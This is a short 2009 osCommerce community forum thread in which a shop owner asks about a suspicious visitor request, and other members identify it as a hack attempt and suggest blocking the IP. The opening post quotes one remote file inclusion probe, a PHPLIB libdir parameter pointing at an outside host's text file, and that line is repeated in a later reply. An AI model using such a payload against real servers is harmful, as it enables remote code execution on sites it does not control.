osCommerce Community Support Forums: Customer or Hack attempt? - osCommerce Community Support Forums

Jump to content

Corporate Sponsor


Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

Customer or Hack attempt? Rate Topic: -----

#1 User is offline   Mort-lemur Icon

  • Find Posts
  • Group: Community Member
  • Posts: 142
  • Joined: 11-June 09
  • Real Name:Heather
  • Gender:Female
  • Location:UK

Posted 07 November 2009 - 03:50 PM

Hi,

Just saw a customer online looking at this //?_PHPLIB[libdir]=http://jokoyuma.fileave.com/iddua.txt??? he had an IP address of 85.111.12.199

anyone know what this could be??
0

#2 User is offline   usernamenone Icon

  • Find Posts
  • Group: Community Member
  • Posts: 2,067
  • Joined: 16-May 06
  • Real Name:Lola
  • Gender:Female
  • Location:United States

Posted 08 November 2009 - 04:53 AM

Well, it probably is

http://dnsbl.abuse.c...s=85.111.12.199

You should block his ip in the control panel if you can.

This post has been edited by usernamenone: 08 November 2009 - 04:55 AM

0

#3 User is offline   Coopco Icon

  • Find Posts
  • Group: Community Member
  • Posts: 9,514
  • Joined: 12-December 04
  • Real Name:Leslie Cooper
  • Gender:Male
  • Location:Melbourne, Australia

Posted 08 November 2009 - 08:24 AM

View Postusernamenone, on 08 November 2009 - 02:53 PM, said:

Well, it probably is

http://dnsbl.abuse.c...s=85.111.12.199

You should block his ip in the control panel if you can.

I ban anything that is not a normal osc link.


The Coopco Underwear Shop



If you live to be 100 years of age, that means you have lived for 36,525 days. Don't waste another, there aren't many left.
0

#4 User is online   Jan Zonjee Icon

  • Icon
  • Find Posts
  • Group: Team Member
  • Posts: 5,822
  • Joined: 13-July 04
  • Real Name:Jan Zonjee
  • Gender:Male
  • Location:the Netherlands

Posted 08 November 2009 - 08:31 AM

View PostMort-lemur, on 07 November 2009 - 04:50 PM, said:

Just saw a customer online looking at this //?_PHPLIB[libdir]=http://jokoyuma.fileave.com/iddua.txt??? he had an IP address of 85.111.12.199

anyone know what this could be??

Indeed a hack attempt.
0

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic